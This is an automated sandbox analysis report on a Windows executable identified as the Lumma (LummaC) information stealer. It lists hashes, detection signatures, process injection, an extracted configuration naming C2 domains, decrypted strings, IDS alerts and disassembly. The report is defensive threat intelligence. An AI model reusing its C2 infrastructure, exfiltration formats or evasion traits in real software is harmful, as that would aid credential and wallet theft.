Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ceFgl3jkkk.exe

Overview

General Information

Sample name:ceFgl3jkkk.exe
renamed because original name is a hash value
Original sample name:857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623.exe
Analysis ID:1560168
MD5:9cf2fcabd10ee683a3652815014b368c
SHA1:f49914f1cf2b7fbba812eb8fd807b19065008b23
SHA256:857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623
Tags:77-105-161-194exeuser-JAMESWT_MHT
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ceFgl3jkkk.exe (PID: 824 cmdline: "C:\Users\user\Desktop\ceFgl3jkkk.exe" MD5: 9CF2FCABD10EE683A3652815014B368C)
    • ceFgl3jkkk.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\ceFgl3jkkk.exe" MD5: 9CF2FCABD10EE683A3652815014B368C)
      • ngentask.exe (PID: 2976 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "vennurviot.sbs", "allocatinow.sbs", "droppyrelivei.cfd", "condifendteu.sbs", "ehticsprocw.sbs", "enlargkiw.sbs"], "Build id": "DtiPjR--NashTraff"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:26.060652+010020283713Unknown Traffic192.168.2.949765104.102.49.254443TCP
    2024-11-21T13:45:28.616606+010020283713Unknown Traffic192.168.2.949776188.114.97.3443TCP
    2024-11-21T13:45:29.977517+010020283713Unknown Traffic192.168.2.949780188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:29.330441+010020546531A Network Trojan was detected192.168.2.949776188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:29.330441+010020498361A Network Trojan was detected192.168.2.949776188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:28.616606+010020574161Domain Observed Used for C2 Detected192.168.2.949776188.114.97.3443TCP
    2024-11-21T13:45:29.977517+010020574161Domain Observed Used for C2 Detected192.168.2.949780188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:22.503700+010020565681Domain Observed Used for C2 Detected192.168.2.9648951.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:23.786678+010020565581Domain Observed Used for C2 Detected192.168.2.9493061.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:24.034227+010020565561Domain Observed Used for C2 Detected192.168.2.9613841.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:23.539228+010020565601Domain Observed Used for C2 Detected192.168.2.9606021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:22.773752+010020565661Domain Observed Used for C2 Detected192.168.2.9610391.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:27.114029+010020574151Domain Observed Used for C2 Detected192.168.2.9631221.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:22.256926+010020565701Domain Observed Used for C2 Detected192.168.2.9579191.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:23.031762+010020565641Domain Observed Used for C2 Detected192.168.2.9591111.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:23.292257+010020565621Domain Observed Used for C2 Detected192.168.2.9536271.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-21T13:45:26.878290+010028586661Domain Observed Used for C2 Detected192.168.2.949765104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ceFgl3jkkk.exeAvira: detected
    Source: https://marshal-zhukov.com/api)Avira URL Cloud: Label: malware
    Source: https://marshal-zhukov.com/apisAvira URL Cloud: Label: malware
    Source: droppyrelivei.cfdAvira URL Cloud: Label: malware
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "vennurviot.sbs", "allocatinow.sbs", "droppyrelivei.cfd", "condifendteu.sbs", "ehticsprocw.sbs", "enlargkiw.sbs"], "Build id": "DtiPjR--NashTraff"}
    Source: ceFgl3jkkk.exeReversingLabs: Detection: 44%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: ceFgl3jkkk.exeJoe Sandbox ML: detected
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: condifendteu.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: vennurviot.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: resinedyw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: allocatinow.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: mathcucom.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: droppyrelivei.cfd
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString decryptor: DtiPjR--NashTraff
    Source: ceFgl3jkkk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49765 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49776 version: TLS 1.2
    Source: ceFgl3jkkk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: _ssl.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _queue.pyd.0.dr
    Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.0.dr
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:55:02 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\python39.pdb source: python39.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _asyncio.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,0_2_00F603E2
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F699B3 FindFirstFileExW,0_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F699B3 FindFirstFileExW,2_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,2_2_00F603E2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4E7D7006h3_2_004410DE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+02h]3_2_0041032C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]3_2_0040D330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 27BAF212h3_2_0044082D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edi, ecx3_2_0040F882
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042F04C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edx], cl3_2_0042F04C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h3_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h3_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004240E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+299316FDh]3_2_004440F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042E080
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [edi], dx3_2_0040C150
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h3_2_0043E100
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042D13C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042D13C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-15FF4FD1h]3_2_004411C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+08h]3_2_0040F1A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+40h]3_2_004292C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h3_2_004012D5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042B2AA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov dword ptr [0044FE84h], esi3_2_00441322
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov edi, dword ptr [esi+04h]3_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-352DC610h]3_2_0042C442
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042C442
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+72E893D5h]3_2_0041D44C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C85F7986h3_2_0043D4D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_004374E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_004124A9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebx, eax3_2_0040A5D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebp, eax3_2_0040A5D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042F5E8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042F5E8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042F5E8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042D590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ebx, dword ptr [esp]3_2_0042C5B6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h3_2_0043D6C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+608185C2h]3_2_004226F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]3_2_004226F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+72E892F9h]3_2_0041D68E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h3_2_0041D68E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edx], al3_2_00430698
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edx], al3_2_00430698
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi-41CF7017h]3_2_004106BE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042B76F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-659232DCh]3_2_0041F860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0041F860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp di, 005Ch3_2_0041F860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h3_2_0043D820
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040D830
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi+25h]3_2_00408890
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_0042B8A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0043E8B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+299316FDh]3_2_00444930
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042FA6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00425AF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1CBB9425h3_2_00441A90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 07E776F1h3_2_00441A90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp eax3_2_0041EB05
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h3_2_0043DB10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0040EB29
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h3_2_0041DBCE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042DBD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then add edi, 02h3_2_0042DBD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_0042BCB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov ecx, edx3_2_00420C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [edx], al3_2_00430C1E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_00430C1E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+72E892D9h]3_2_0043EC20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], F3285E74h3_2_0043EC20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h3_2_0043EC20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h3_2_00429C80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then jmp eax3_2_0042CC8A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042CC8A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]3_2_00404CB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_0042BCB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_00405D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then mov esi, eax3_2_00425D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh3_2_0043DD10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+72E89391h]3_2_00421D90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ebp+1C76AA82h]3_2_0040DE20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h3_2_0041DED1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_0043BEE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi+10h]3_2_0042BF7F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_00443FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h3_2_0043DFA0

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.9:59111 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.9:61384 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.9:53627 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.9:60602 -> 1.1.1.1:53
